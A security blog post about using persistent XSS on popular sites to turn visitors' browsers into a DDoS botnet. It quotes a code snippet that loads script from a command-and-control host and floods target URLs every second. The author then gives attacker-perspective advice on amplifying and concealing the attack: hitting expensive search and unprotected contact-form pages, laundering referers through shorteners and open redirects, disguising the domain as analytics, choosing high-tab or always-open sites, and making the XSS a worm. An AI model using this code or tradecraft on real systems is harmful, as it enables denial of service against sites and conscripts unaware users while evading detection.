More Advanced XSS Denial of Service Attacks?
After reading Incapsula’s blog post about how an “Alexa Top 50″ website suffered an XSS vulnerability which hacker(s) used to attack a victim domain it got me thinking. The attack simply preformed an XMLHttpRequest to the victim domain on a continuous loop to flood the target with rogue GET requests.
The snippet provided by Incapsula:
// JavaScript Injection in <img> tag enabled by Persistent XSS <img src="/imagename.jpg" onload="$.getScript('http://c&cdomain.com/index.html')" /> // Malicious JavaScript opens hidden <iframe> function ddos(url) { $("body").append("<iframe id='ifr11323' style='display:none;' src='http://c&cdomain.com/index.html'></iframe>"); } // Ajax DDoS tool in executes GET request every second <html><body> <h1>Iframe</h1> <script> ddos('http://www.target1.com/1.jpg', 'http://www.target2.com/1.jpg'); function ddos(url,url2){ window.setInterval(function (){ $.getScript(url); $.getScript(url2); },1000) } </script> </body></html>
This attack seemed very simple and perhaps was just a test of the functionality of this attack.
Clever, the attacker uses an XSS vulnerability in a popular site to make uninfected victims attack a target domain. No need for dirty exploit packs and keeping malware under detection from AV! Although a simple patch from the vulnerable site could stop this exploit pretty quickly.
Better XSS DoS Attack?
So our biggest fear as a hacker would be:
- The vulnerable site figuring out our madness and fixing their vulnerable site
- The victim site figuring out where the attack originated from and contacting the vulnerable site about it
- The victim site being able to filter out these malicious requests from happening
- Not causing enough damage with the flood of requests coming in (think more bang for your request!)
- Finding a vulnerable site with lots of traffic and persistent viewers
Here are a few tricks that a hacker could use to make this type of attack even stronger and more stealthy.
Request the Most Resource Intensive Page
Every request counts – a hacker should ensure that his victim’s flood isn’t going to waste. Choosing a page which upon request would cause the most backend work is an important part.
For example a request for:
http://victim.com/index.php
Wouldn’t be as resource intensive as:
http://victim.com/search.php?query=e&category=all&results=100
The second URL would cause a considerable amount more work on the victim’s server. Searching for the letter “e” in the entire database is a pretty exhaustive action!
Even worse if a site had a page such as:
http://victim.com/email_us.php
Without any sort of CSRF token protection, chaining the vulnerabilities together could cause one hell of a headache! A bunch of XMLHttpRequests hammering an email contact form could end very badly indeed.
The possibilities are quite endless especially when you start chaining together other “low risk” vulnerabilities.
Hide the Source with Link Shorteners and Open Redirect Chaining
Hiding the source of the attack is probably a good idea as well, if the victim site sees lots of “Referer” headers pointing to “hacker-site.pw” or “vulnerable-site.com” they may investigate.
A better route would probably look more like this following: [ Vulnerable Site XSS ] -> Hacker Site With Redirect -> Link Shortener -> Victim Site Search Query</p>
That seems like a pretty long chain but it has the advantage of having the referer come out as a link shortener service and not the hacker’s site or the vulnerable site. It also allows flexibility to swap out link shortening services if a link is marked as bad or deleted.
What about chaining another vulnerability to make things better? What if our victim site was vulnerable to open redirect? Perhaps just a random site with an open redirect vulnerability? [ Vulnerable Site XSS ] -> Hacker Site With Redirect -> Victim Site Open Redirect Page -> Victim Site Search Query</p>
Now the victim site is gonna have a bit of an issue filtering traffic since it’s coming from a page of their own! [ Vulnerable Site XSS ] -> Hacker Site With Redirect -> Random Site Open Redirect Page -> Victim Site Search Query</p>
This chain involves some random site with an open redirect vulnerability being the last hop. This effectively removes the issue of being flagged by a URL shortener and shifts the work onto the victim site to fix the open site redirect page.
If the hacker wanted to be extra clever he could simple make his domain appear as an ad server or some sort of analytics service. For example a background HTTP request for a site like “burst-analytics.com” looks a lot more legitimate then a site like “viagra-free-sample.ru” or “03495ja.info”. If done in a clever way the attack could be preformed for a reasonable period without detection by any of the users preforming the attack.
Finding a Good Vulnerable Site
Finally, having a certain type of vulnerable site is an important factor. As pointed out by Incapsula video sites are an effective target because victims spend a long period on a page watching a video to completion. This becomes the perfect site because the longer the page is open the longer the attack goes on for.
Even better, what if it was a site that people usually had multiple tabs open? Videos are cool but having 20 tabs open (like seemingly every Chrome user in existence) is a multitude stronger of an attack.
Sites like Reddit, Digg, and other linked sharing services are a good choice for these types of attacks. It also goes without saying that porn sites are *ahem* a good option due to the fact that users often open lots of tabs for the same site. Not that I’m judging.
Even better are sites like Spotify or desktop apps that are basically watered down web views which can sit in your dock idling forever. If you had an XSS attack running on one of those services it could continue 24/7 uninterrupted.
If you really wanna get crazy, make the XSS a worm and spread it across even more of the site. See this post about doing JavaScript self propagating worms here that I wrote a while ago.
Conclusion
Overall these types are attacks are bound to happen again as they are simple and effective when done in a clever way. If chained with a lack of CSRF tokens or an Open Redirect vulnerability things could get much more powerful and complex. They also have a big advantage in that they don’t require any sort of infection on a victims computer but rather just some rogue JS on a vulnerable site.
It really makes you think, should these large sites be help responsible for vulnerabilities that allow attacks like this to happen? A good comparison would be DNS amplification attacks which allow DoS attack to be amplified through the use of vulnerable DNS servers.
Until next time,
-mandatory